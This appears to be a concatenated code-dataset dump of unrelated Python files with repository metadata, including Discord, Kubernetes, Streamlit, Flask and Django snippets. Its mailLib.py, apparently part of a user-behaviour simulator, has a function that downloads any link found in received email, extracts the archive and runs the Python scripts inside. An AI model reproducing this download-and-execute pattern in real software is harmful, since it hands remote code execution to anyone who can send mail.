| 31.121212 | 79 | 0.477118 | 404 | 3,081 | 3.517327 | 0.220297 | 0.106967 | 0.215341 | 0.080929 | 0.190007 | 0.142153 | 0.040816 | 0.040816 | 0 | 0 | 0 | 0.061455 | 0.339825 | 3,081 | 98 | 80 | 31.438776 | 0.637168 | 0.007465 | 0 | 0.159091 | 0 | 0 | 0.053974 | 0 | 0 | 0 | 0.013739 | 0 | 0 | 1 | 0.068182 | false | 0 | 0.022727 | 0 | 0.193182 | 0.011364 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
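A minimal, hypothetical round-trip for the Registers model in the registers.py file above; the import path is assumed, and the assertions only restate the 8/16-bit register pairing the class already implements:

# Illustrative sketch only; module path is assumed, not taken from the repo.
from registers import Registers

regs = Registers()
regs.write("hl", 0xBEEF)          # writing a 16-bit pair...
assert regs.read("h") == 0xBE     # ...updates the two 8-bit halves
assert regs.read("l") == 0xEF
assert regs.read("hl") == 0xBEEF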
1efa2e6d895702b8d443cbba288ae926b3327dee | 290 | py | Python | DiscordRPC/__init__.py | EterNomm/discord-rpc | 86bdf35a75df9ab8971763042d19f2f820e08a51 | [
"Apache-2.0"
] | 4 | 2021-12-13T13:26:00.000Z | 2022-02-20T17:11:19.000Z | DiscordRPC/__init__.py | LyQuid12/discord-rpc | 86bdf35a75df9ab8971763042d19f2f820e08a51 | [
"Apache-2.0"
] | null | null | null | DiscordRPC/__init__.py | LyQuid12/discord-rpc | 86bdf35a75df9ab8971763042d19f2f820e08a51 | [
"Apache-2.0"
] | null | null | null | from .presence import *
from .button import button
from .exceptions import *
#from .get_current_app import GCAR (Disabling due to a bug)
__title__ = "Discord-RPC"
__version__ = "3.5"
__authors__ = "LyQuid"
__license__ = "Apache License 2.0"
__copyright__ = "Copyright 2021-present LyQuid"
| 26.363636 | 59 | 0.762069 | 39 | 290 | 5.102564 | 0.74359 | 0.100503 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.032129 | 0.141379 | 290 | 10 | 60 | 29 | 0.767068 | 0.2 | 0 | 0 | 0 | 0 | 0.290043 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.375 | 0 | 0.375 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
1efbf1d335ee13e467149f16bec6b633d71434fe | 1,314 | py | Python | src/graph/cli/server.py | clayman-micro/graph | 742015c276f89841310794e952280a06c24fe8ef | [
"MIT"
] | null | null | null | src/graph/cli/server.py | clayman-micro/graph | 742015c276f89841310794e952280a06c24fe8ef | [
"MIT"
] | null | null | null | src/graph/cli/server.py | clayman-micro/graph | 742015c276f89841310794e952280a06c24fe8ef | [
"MIT"
] | null | null | null | import socket
import click
import uvicorn # type: ignore
def get_address(default: str = "127.0.0.1") -> str:
try:
ip_address = socket.gethostbyname(socket.gethostname())
except socket.gaierror:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
s.connect(("8.8.8.8", 1))
ip_address = s.getsockname()[0]
except socket.gaierror:
ip_address = default
finally:
s.close()
return ip_address
@click.group()
@click.pass_context
def server(ctx):
pass
@server.command()
@click.option("--host", default=None, help="Specify application host")
@click.option("--port", default=5000, help="Specify application port")
@click.pass_context
def run(ctx, host, port):
try:
port = int(port)
        if port < 1024 or port > 65535:
raise RuntimeError("Port should be from 1024 to 65535")
except ValueError:
raise RuntimeError("Port should be numeric")
if not host:
host = "127.0.0.1"
address = "127.0.0.1"
else:
address = get_address()
uvicorn.run(
"graph:init",
host=address,
port=port,
access_log=False,
log_level="info",
log_config=None,
loop="uvloop",
factory=True,
)
| 22.655172 | 70 | 0.590563 | 164 | 1,314 | 4.652439 | 0.445122 | 0.047182 | 0.019659 | 0.023591 | 0.076016 | 0 | 0 | 0 | 0 | 0 | 0 | 0.049041 | 0.286149 | 1,314 | 57 | 71 | 23.052632 | 0.764392 | 0.009132 | 0 | 0.152174 | 0 | 0 | 0.13 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.065217 | false | 0.065217 | 0.065217 | 0 | 0.152174 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
1efed2c2a7cb93434e5d67d1db9954f3a5ff1653 | 1,543 | py | Python | kubespawner/clients.py | moskiGithub/spawner_test | 405f088041054080f53b620b68fe040e5e0b091a | [
"BSD-3-Clause"
] | null | null | null | kubespawner/clients.py | moskiGithub/spawner_test | 405f088041054080f53b620b68fe040e5e0b091a | [
"BSD-3-Clause"
] | null | null | null | kubespawner/clients.py | moskiGithub/spawner_test | 405f088041054080f53b620b68fe040e5e0b091a | [
"BSD-3-Clause"
] | null | null | null | """Shared clients for kubernetes
avoids creating multiple kubernetes client objects,
each of which spawns an unused max-size thread pool
"""
from unittest.mock import Mock
import weakref
import kubernetes.client
from kubernetes.client import api_client
# FIXME: remove when instantiating a kubernetes client
# doesn't create N-CPUs threads unconditionally.
# monkeypatch threadpool in kubernetes api_client
# to avoid instantiating ThreadPools.
# This is known to work for kubernetes-4.0
# and may need updating with later kubernetes clients
_dummy_pool = Mock()
api_client.ThreadPool = lambda *args, **kwargs: _dummy_pool
_client_cache = {}
def shared_client(ClientType, *args, **kwargs):
"""Return a single shared kubernetes client instance
A weak reference to the instance is cached,
so that concurrent calls to shared_client
will all return the same instance until
all references to the client are cleared.
"""
kwarg_key = tuple((key, kwargs[key]) for key in sorted(kwargs))
cache_key = (ClientType, args, kwarg_key)
client = None
if cache_key in _client_cache:
# resolve cached weakref
# client can still be None after this!
client = _client_cache[cache_key]()
if client is None:
Client = getattr(kubernetes.client, ClientType)
client = Client(*args, **kwargs)
# cache weakref so that clients can be garbage collected
_client_cache[cache_key] = weakref.ref(client)
return client
| 32.829787 | 68 | 0.711601 | 203 | 1,543 | 5.295567 | 0.46798 | 0.089302 | 0.029767 | 0.035349 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.001672 | 0.224887 | 1,543 | 46 | 69 | 33.543478 | 0.897157 | 0.483474 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.021739 | 0 | 1 | 0.055556 | false | 0 | 0.222222 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
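A short usage sketch for the shared_client helper defined in the kubespawner/clients.py file above; it is illustrative only and assumes the kubernetes package is installed:

# Two calls with identical arguments return the same cached instance
# while a strong reference to the first client is still held.
from kubespawner.clients import shared_client

v1_a = shared_client("CoreV1Api")
v1_b = shared_client("CoreV1Api")
assert v1_a is v1_b  # resolved from the weakref cache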
480a52a59f5e6ca79a9056130cb2d9abb336a9ed | 11,497 | py | Python | sim_user/mailLib.py | silicom-hub/IS_simulator | 4d134a8051c3604a94c2552503ff24015a3e86ee | [
"MIT"
] | 4 | 2021-11-24T10:58:51.000Z | 2022-03-11T15:13:22.000Z | sim_user/mailLib.py | silicom-hub/IS_simulator | 4d134a8051c3604a94c2552503ff24015a3e86ee | [
"MIT"
] | 1 | 2021-11-24T09:16:08.000Z | 2021-11-30T16:19:41.000Z | sim_user/mailLib.py | silicom-hub/IS_simulator | 4d134a8051c3604a94c2552503ff24015a3e86ee | [
"MIT"
] | 1 | 2021-11-24T11:10:38.000Z | 2021-11-24T11:10:38.000Z | import os
import wget
import time
import glob
import getpass
import tarfile
import subprocess
import email.mime.multipart
import email.mime.text
import email.mime.image
import email.mime.audio
from datetime import datetime
from pprint import pprint
from colorama import Style, Fore
from smtplib import SMTP, SMTP_SSL
from imaplib import IMAP4_SSL, IMAP4
def smtp_connect(smtp_server, verbose=True):
""" Conection to smtp server.
smtp_server_ip (str): This value is the smtp server's ip.
verbose (boolean): Print information about function progress.
Returns:
None
"""
try:
smtp = SMTP_SSL(host=smtp_server)
smtp.ehlo()
if verbose:
print(Fore.GREEN+ " ==> [smtp_connect] with SSL" +Style.RESET_ALL)
return smtp
except:
try:
smtp = SMTP(host=smtp_server)
smtp.ehlo()
if verbose:
print(Fore.GREEN+ " ==> [smtp_connect] without SSL" +Style.RESET_ALL)
return smtp
except:
print(Fore.RED+ " ==> [smtp_connect] failed!" +Style.RESET_ALL)
return 1
def imap_connect(imap_server, username, password, verbose=True):
""" Connection to imp server.
imap_server_ip (str): This value is the imap server's ip.
verbose (boolean): Print information about function progress.
Returns:
None
"""
try:
imap = IMAP4_SSL(imap_server)
imap.login(username, password)
if verbose:
print(Fore.GREEN+ " ==> [imap_connect] with SSL" +Style.RESET_ALL)
return imap
except:
try:
imap = IMAP4(imap_server)
imap.login(username, password)
if verbose:
print(Fore.GREEN+ " ==> [imap_connect] without SSL" +Style.RESET_ALL)
return imap
except:
print(Fore.RED+ " ==> [imap_connect] failed!" +Style.RESET_ALL)
def send_mail(smtp_server, FROM="", TO="", subject="", msg="", attachements=[], verbose=True):
""" Send mail.
smtp_server_ip (str): This value is the smtp server's ip.
FROM (str): This value is the sender email address.
TO (list): This value is a list of multiple recipient
SUBJECT (str, Optional): This value is the email's subject content.
msg (str, Optional): This value is the email's message content.
attachements (list Optional):
verbose (boolean): Print information about function progress.
Returns:
None
"""
smtp = smtp_connect(smtp_server, verbose=False)
mail = email.mime.multipart.MIMEMultipart()
mail["Subject"] = "[ "+subject+" ]"
mail["From"] = FROM
mail["To"] = TO
msg = email.mime.text.MIMEText(msg, _subtype="plain")
msg.add_header("Content-Disposition", "email message")
mail.attach(msg)
for attachement in attachements:
if attachement[0] == "image":
img = email.mime.image.MIMEImage(open(attachement[1], "rb").read())
img.add_header("Content-Disposition", "attachement")
img.add_header("Attachement-type", "image")
img.add_header("Attachement-filename", attachement[1])
mail.attach(img)
if attachement[0] == "file":
text = email.mime.text.MIMEText(open(attachement[1], "r").read())
text.add_header("Content-Disposition", "attachement")
text.add_header("Attachement-type", "filetext")
text.add_header("Attachement-filename", attachement[1])
mail.attach(text)
try:
smtp.sendmail(mail["From"], mail["To"], mail.as_string())
if verbose:
print(Fore.GREEN+ " ==> [send_mail] "+mail["From"]+" --> "+mail["To"]+" {"+subject+"} -- "+ time.strftime("%H:%M:%S", time.localtime()) +Style.RESET_ALL)
smtp_logout(smtp, verbose=False)
except Exception as e:
print(Fore.RED+ " ==> [send_mail] failed! "+mail["From"]+" --> "+mail["To"]+" -- "+ time.strftime("%H:%M:%S", time.localtime()) +Style.RESET_ALL)
print(Fore.RED+str(e)+Style.RESET_ALL)
smtp_logout(smtp, verbose=False)
def read_mailbox(imap_server, username, password, verbose=True): # attribute [ _payload ]
""" Read email inbox
imap_server_ip (str): This value is the imap server's ip.
login (str): This value is the username login.
password (str): This value is the password login.
verbose (boolean): Print information about function progress.
Returns:
list of str: all emails content
"""
imap = imap_connect(imap_server, username, password, verbose=False)
all_mails = []
imap.select("INBOX")
status, mails = imap.search(None, "ALL")
for mail in mails[0].split():
status, data = imap.fetch(mail, "(RFC822)")
mail_content = email.message_from_string(data[0][1].decode("utf-8"))
all_mails.append(mail_content)
for part in mail_content.walk():
if not part.is_multipart():
pass
if verbose:
print(Fore.GREEN+ " ==> [read_mailbox] {"+str(len(mails)-1)+"} -- "+ time.strftime("%H:%M:%S", time.localtime()) +Style.RESET_ALL)
imap_logout(imap, verbose=False)
return all_mails
def read_mailbox_download_execute(imap_server, imap_login, imap_password):
""" Read email inbox and download link inside.
imap_server_ip (str): This value is the imap server's ip.
imap_login (str): This value is the username login.
imap_password (str): This value is the password login.
verbose (boolean): Print information about function progress.
Returns:
list of str: all emails content
"""
try:
path = None
mails = read_mailbox(imap_server, imap_login, imap_password, verbose=False)
if len(mails) <= 0:
print(Fore.YELLOW+ " ==> [read_mailbox_download_execute] {"+str(len(mails)-1)+"} -- "+ time.strftime("%H:%M:%S", time.localtime()) +Style.RESET_ALL)
return 0
for mail in mails:
for element in str(mail).replace("\n", " ").split(" "):
if "http" in element:
path = wget.download(element)
        if path is None:
print(Fore.YELLOW+ " ==> [read_mailbox_download_execute] {"+str(len(mails)-1)+"} -- "+ time.strftime("%H:%M:%S", time.localtime()) +Style.RESET_ALL)
return 0
tarf_file = tarfile.open(path)
tarf_file.extractall(".")
tarf_file.close()
python_files = glob.glob("*/*maj*.py")
for python_script in python_files:
subprocess.getoutput("python3 "+python_script)
print(Fore.GREEN+ " ==> [read_mailbox_download_execute] {"+str(len(mails)-1)+"} -- "+ time.strftime("%H:%M:%S", time.localtime()) +Style.RESET_ALL)
return True
except Exception as e:
print(Fore.RED+ " ==> [read_mailbox_download_execute] failed during execution! -- "+ time.strftime("%H:%M:%S", time.localtime()) +Style.RESET_ALL)
print(e)
return False
def download_attachements(imap_server, username, password, verbose=True):
""" Read email inbox and download attachements.
imap_server_ip (str): This value is the imap server's ip.
imap_login (str): This value is the username login.
imap_password (str): This value is the password login.
verbose (boolean): Print information about function progress.
Returns:
list of str: all emails content
"""
imap = imap_connect(imap_server, username, password, verbose=False)
#INIT
if not os.path.isdir("/home/"+getpass.getuser()+"/Downloads"):
os.makedirs("/home/"+getpass.getuser()+"/Downloads")
mails = []
imap.select("INBOX")
status, mails = imap.search(None, "ALL")
for mail in mails[0].split():
status, data = imap.fetch(mail, "(RFC822)")
mail_content = email.message_from_string(data[0][1].decode("utf-8"))
for part in mail_content.walk():
if not part.is_multipart():
if part["Content-Disposition"] == "attachement" and part["Attachement-type"] == "filetext":
username = getpass.getuser()
file = open(part["Attachement-filename"],"w")
file.write(part._payload)
file.close()
imap_logout(imap, verbose=False)
print(Fore.GREEN+ " ==> [download_attachements] --- " + time.strftime("%H:%M:%S", time.localtime())+Style.RESET_ALL)
# In progress
def delete_old_emails(imap, time_laps=60):
delete_messages = []
imap.select("INBOX")
status, mails = imap.search(None, "ALL")
for mail in mails[0].split():
status, data = imap.fetch(mail, "(RFC822)")
mail_content = email.message_from_string(data[0][1].decode("utf-8"))
if (time.time() - time.mktime(time.strptime(mail_content["Date"], "%a, %d %b %Y %H:%M:%S %z")) >= time_laps ):
delete_messages.append(mail)
delete_emails(imap, delete_messages)
def delete_emails(imap, mails):
""" Delete mails specified in attributs
imap (imap_object): This value is the imap server's object.
mails (list): This value is an email list to delete.
Returns:
list of str: all emails content
"""
for mail in mails:
imap.store(mail,"+FLAGS","\\Deleted")
imap.expunge()
def delete_all_emails(imap_server, username, password, verbose=True):
""" Delete all emails in INBOX.
imap_server_ip (str): This value is the imap server's ip.
imap_login (str): This value is the username login.
imap_password (str): This value is the password login.
verbose (boolean): Print information about function progress.
Returns:
list of str: all emails content
"""
imap = imap_connect(imap_server, username, password, verbose=False)
delete_messages = []
imap.select("INBOX")
status, mails = imap.search(None, "ALL")
for mail in mails[0].split():
delete_messages.append(mail)
delete_emails(imap, delete_messages)
status, mails = imap.search(None, "ALL")
if len(mails) == 1:
print(Fore.GREEN+ " ==> [delete_all_emails] was successfull --- " + time.strftime("%H:%M:%S", time.localtime()) +Style.RESET_ALL)
imap_logout(imap, verbose=False)
return 0
print(Fore.RED+ " ==> [delete_all_emails] failed! --- " + time.strftime("%H:%M:%S", time.localtime()) +Style.RESET_ALL)
imap_logout(imap, verbose=False)
return 1
def imap_logout(imap, verbose=True):
""" Logout out to the imap service
imap (imap_object): This value is the imap server's object.
Returns:
None
"""
try:
imap.close()
imap.logout()
if verbose:
print(Fore.GREEN+ " ==> [imap_logout] was successfull" +Style.RESET_ALL)
except:
print(Fore.RED+ " ==> [imap_logout] failed" +Style.RESET_ALL)
def smtp_logout(smtp, verbose=True):
""" Logout out to the smtp service
smtp (smtp_object): This value is the smtp server's object.
Returns:
None
"""
try:
smtp.quit()
if verbose:
print(Fore.GREEN+ " ==> [smtp_logout] was successfull" +Style.RESET_ALL)
except:
print(Fore.RED+ " ==> [smtp_logout] failed" +Style.RESET_ALL)
| 41.060714 | 168 | 0.609898 | 1,431 | 11,497 | 4.781272 | 0.134871 | 0.030254 | 0.036977 | 0.04297 | 0.655949 | 0.590178 | 0.540047 | 0.494592 | 0.456299 | 0.431453 | 0 | 0.005383 | 0.256676 | 11,497 | 279 | 169 | 41.207885 | 0.795226 | 0.231278 | 0 | 0.424731 | 0 | 0 | 0.151743 | 0.017252 | 0 | 0 | 0 | 0 | 0 | 1 | 0.05914 | false | 0.086022 | 0.086022 | 0 | 0.209677 | 0.123656 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
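A hypothetical end-to-end use of the mail helpers above; host names, accounts and file names are placeholders, not values from the repository:

# Illustrative flow only.
import mailLib

mailLib.send_mail(
    "mail.example.local",
    FROM="alice@example.local",
    TO="bob@example.local",
    subject="status",
    msg="hello",
    attachements=[("file", "report.txt")],  # ("image", path) is also accepted
)
for message in mailLib.read_mailbox("mail.example.local", "bob", "secret"):
    print(message["Subject"])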
480d49129b8a557b65a1a726cce2b2b64435ab5e | 1,418 | py | Python | streamlitfront/tests/dummy_app.py | i2mint/streamlitfront | 6fbc03a42cdb7436dcda3da00fb9b42965bbb582 | [
"Apache-2.0"
] | null | null | null | streamlitfront/tests/dummy_app.py | i2mint/streamlitfront | 6fbc03a42cdb7436dcda3da00fb9b42965bbb582 | [
"Apache-2.0"
] | 1 | 2022-02-03T15:21:57.000Z | 2022-02-05T00:51:33.000Z | streamlitfront/tests/dummy_app.py | i2mint/streamlitfront | 6fbc03a42cdb7436dcda3da00fb9b42965bbb582 | [
"Apache-2.0"
] | null | null | null | from streamlitfront.base import get_pages_specs, get_func_args_specs, BasePageFunc
import streamlit as st
from pydantic import BaseModel
import streamlit_pydantic as sp
def multiple(x: int, word: str) -> str:
return str(x) + word
class Input(BaseModel):
x: int
y: str
def multiple_input(input: Input):
return input.x * input.y
class SimplePageFunc2(BasePageFunc):
def __call__(self, state):
self.prepare_view(state)
# args_specs = get_func_args_specs(self.func)
element = sp.pydantic_input('input', Input)
st.write(element)
# func_inputs = dict(self.sig.defaults, **state['page_state'][self.func])
func_inputs = {'input': element}
st.write(func_inputs)
# for argname, spec in args_specs.items():
# st.write(f"argname:{argname}")
# st.write(f"spec:{spec}")
# element_factory, kwargs = spec["element_factory"]
# func_inputs[argname] = element_factory(**kwargs)
# st.write(f"element_factory:{element_factory}")
# st.write(f"kwargs:{kwargs}")
submit = st.button('Submit')
if submit:
st.write(self.func(func_inputs['input']))
# state['page_state'][self.func].clear()
DFLT_PAGE_FACTORY = SimplePageFunc2
if __name__ == '__main__':
app = get_pages_specs([multiple_input], page_factory=DFLT_PAGE_FACTORY)
app['Multiple Input'](None)
| 28.938776 | 82 | 0.658674 | 182 | 1,418 | 4.879121 | 0.307692 | 0.05518 | 0.036036 | 0.036036 | 0.13964 | 0 | 0 | 0 | 0 | 0 | 0 | 0.001795 | 0.214386 | 1,418 | 48 | 83 | 29.541667 | 0.795332 | 0.300423 | 0 | 0 | 0 | 0 | 0.043833 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.12 | false | 0 | 0.16 | 0.08 | 0.52 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
480d62d6a3b8b59327c71459cf291592859ce935 | 367 | py | Python | app/build.py | dhost-project/build-microservice | 4376169a2753f37fe8c7985525bd3fd3af6f11e7 | [
"MIT"
] | null | null | null | app/build.py | dhost-project/build-microservice | 4376169a2753f37fe8c7985525bd3fd3af6f11e7 | [
"MIT"
] | null | null | null | app/build.py | dhost-project/build-microservice | 4376169a2753f37fe8c7985525bd3fd3af6f11e7 | [
"MIT"
] | null | null | null | from flask_restful import Resource, reqparse
parser = reqparse.RequestParser()
parser.add_argument('command', required=True)
parser.add_argument('docker', required=True)
class Build(Resource):
def get(self):
return {'status': 'building'}
def post(self):
args = parser.parse_args()
print(args)
return {'status': 'started'}
| 21.588235 | 45 | 0.6703 | 42 | 367 | 5.761905 | 0.642857 | 0.07438 | 0.140496 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.19891 | 367 | 16 | 46 | 22.9375 | 0.823129 | 0 | 0 | 0 | 0 | 0 | 0.108992 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.181818 | false | 0 | 0.090909 | 0.090909 | 0.545455 | 0.090909 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
480d6eb2f995a9bfa4e6589d0220badcbea502c9 | 1,224 | py | Python | src/unicon/plugins/windows/__init__.py | nielsvanhooy/unicon.plugins | 3416fd8223f070cbb67a2cbe604e3c5d13584318 | [
"Apache-2.0"
] | 18 | 2019-11-23T23:14:53.000Z | 2022-01-10T01:17:08.000Z | src/unicon/plugins/windows/__init__.py | nielsvanhooy/unicon.plugins | 3416fd8223f070cbb67a2cbe604e3c5d13584318 | [
"Apache-2.0"
] | 12 | 2020-11-09T20:39:25.000Z | 2022-03-22T12:46:59.000Z | src/unicon/plugins/windows/__init__.py | nielsvanhooy/unicon.plugins | 3416fd8223f070cbb67a2cbe604e3c5d13584318 | [
"Apache-2.0"
] | 32 | 2020-02-12T15:42:22.000Z | 2022-03-15T16:42:10.000Z | __copyright__ = "# Copyright (c) 2018 by cisco Systems, Inc. All rights reserved."
__author__ = "dwapstra"
from unicon.plugins.generic import GenericSingleRpConnection, service_implementation as svc
from unicon.plugins.generic.connection_provider import GenericSingleRpConnectionProvider
from unicon.plugins.generic import ServiceList, service_implementation as svc
from . import service_implementation as windows_svc
from .statemachine import WindowsStateMachine
from .settings import WindowsSettings
class WindowsConnectionProvider(GenericSingleRpConnectionProvider):
"""
Connection provider class for windows connections.
"""
def init_handle(self):
pass
class WindowsServiceList(ServiceList):
""" windows services. """
def __init__(self):
super().__init__()
self.execute = windows_svc.Execute
class WindowsConnection(GenericSingleRpConnection):
"""
Connection class for windows connections.
"""
os = 'windows'
platform = None
chassis_type = 'single_rp'
state_machine_class = WindowsStateMachine
connection_provider_class = WindowsConnectionProvider
subcommand_list = WindowsServiceList
settings = WindowsSettings()
| 29.853659 | 91 | 0.763072 | 114 | 1,224 | 7.929825 | 0.491228 | 0.033186 | 0.056416 | 0.079646 | 0.132743 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003941 | 0.170752 | 1,224 | 40 | 92 | 30.6 | 0.8867 | 0.089869 | 0 | 0 | 0 | 0 | 0.082397 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.086957 | false | 0.043478 | 0.26087 | 0 | 0.782609 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
48137f6833204958dbcfd12efea83db5d3727b1f | 158 | py | Python | python/square root.py | SULING4EVER/learngit | d55f942fbd782b309b0490c34a1bb743f6c4ef03 | [
"Apache-2.0"
] | null | null | null | python/square root.py | SULING4EVER/learngit | d55f942fbd782b309b0490c34a1bb743f6c4ef03 | [
"Apache-2.0"
] | null | null | null | python/square root.py | SULING4EVER/learngit | d55f942fbd782b309b0490c34a1bb743f6c4ef03 | [
"Apache-2.0"
] | null | null | null | x=input("Enter a umber of which you want to know the square root.")
x=int(x)
g=x/2
while (g*g-x)*(g*g-x)>0.00000000001:
g=(g+x/g)/2
print(g)
print(g)
| 19.75 | 67 | 0.620253 | 38 | 158 | 2.578947 | 0.552632 | 0.081633 | 0.091837 | 0.081633 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.10687 | 0.170886 | 158 | 7 | 68 | 22.571429 | 0.641221 | 0 | 0 | 0.285714 | 0 | 0 | 0.35443 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.285714 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
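The loop in the script above is Newton's method for square roots; a quick standalone check of the same iteration against math.sqrt (illustrative only):

import math

x = 2
g = x / 2
while (g * g - x) * (g * g - x) > 0.00000000001:
    g = (g + x / g) / 2
print(g, math.sqrt(x))  # both print ~1.41421356...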
481650f94557e95d1e169f088c7d5dec8a6391f7 | 1,212 | py | Python | iaso/migrations/0052_fix_period_before_after.py | ekhalilbsq/iaso | e6400c52aeb4f67ce1ca83b03efa3cb11ef235ee | [
"MIT"
] | 29 | 2020-12-26T07:22:19.000Z | 2022-03-07T13:40:09.000Z | iaso/migrations/0052_fix_period_before_after.py | ekhalilbsq/iaso | e6400c52aeb4f67ce1ca83b03efa3cb11ef235ee | [
"MIT"
] | 150 | 2020-11-09T15:03:27.000Z | 2022-03-07T15:36:07.000Z | iaso/migrations/0052_fix_period_before_after.py | ekhalilbsq/iaso | e6400c52aeb4f67ce1ca83b03efa3cb11ef235ee | [
"MIT"
] | 4 | 2020-11-09T10:38:13.000Z | 2021-10-04T09:42:47.000Z | # Generated by Django 2.1.11 on 2020-06-04 09:19
from django.db import migrations, models
def fix_period_before_after(apps, schema_editor):
# noinspection PyPep8Naming
Form = apps.get_model("iaso", "Form")
for form in Form.objects.filter(period_type=None).exclude(periods_before_allowed=0, periods_after_allowed=0):
form.periods_before_allowed = 0
form.periods_after_allowed = 0
form.save()
class Migration(migrations.Migration):
dependencies = [("iaso", "0051_device_position")]
operations = [
migrations.AlterField(
model_name="form",
name="period_type",
field=models.TextField(
blank=True,
choices=[("MONTH", "Month"), ("QUARTER", "Quarter"), ("SIX_MONTH", "Six-month"), ("YEAR", "Year")],
null=True,
),
),
migrations.AlterField(model_name="form", name="periods_after_allowed", field=models.IntegerField(default=0)),
migrations.AlterField(model_name="form", name="periods_before_allowed", field=models.IntegerField(default=0)),
migrations.RunPython(fix_period_before_after, reverse_code=migrations.RunPython.noop),
]
| 35.647059 | 118 | 0.655116 | 139 | 1,212 | 5.503597 | 0.482014 | 0.04183 | 0.078431 | 0.113725 | 0.338562 | 0.275817 | 0.227451 | 0 | 0 | 0 | 0 | 0.028391 | 0.215347 | 1,212 | 33 | 119 | 36.727273 | 0.776025 | 0.059406 | 0 | 0.086957 | 1 | 0 | 0.130167 | 0.037819 | 0 | 0 | 0 | 0 | 0 | 1 | 0.043478 | false | 0 | 0.043478 | 0 | 0.217391 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
481a590185ab360ad8f0c2ef3e09b5d683dfa4f6 | 26,620 | py | Python | examples/rough_translated1/osgthreadedterrain.py | JaneliaSciComp/osgpyplusplus | a5ae3f69c7e9101a32d8cc95fe680dab292f75ac | [
"BSD-3-Clause"
] | 17 | 2015-06-01T12:19:46.000Z | 2022-02-12T02:37:48.000Z | examples/rough_translated1/osgthreadedterrain.py | cmbruns/osgpyplusplus | f8bfca2cf841e15f6ddb41c958f3ad0d0b9e4b75 | [
"BSD-3-Clause"
] | 7 | 2015-07-04T14:36:49.000Z | 2015-07-23T18:09:49.000Z | examples/rough_translated1/osgthreadedterrain.py | cmbruns/osgpyplusplus | f8bfca2cf841e15f6ddb41c958f3ad0d0b9e4b75 | [
"BSD-3-Clause"
] | 7 | 2015-11-28T17:00:31.000Z | 2020-01-08T07:00:59.000Z | #!/bin/env python
# Automatically translated python version of
# OpenSceneGraph example program "osgthreadedterrain"
# !!! This program will need manual tuning before it will work. !!!
import sys
from osgpypp import OpenThreads
from osgpypp import osg
from osgpypp import osgDB
from osgpypp import osgGA
from osgpypp import osgTerrain
from osgpypp import osgText
from osgpypp import osgUtil
from osgpypp import osgViewer
# Translated from file 'osgthreadedterrain.cpp'
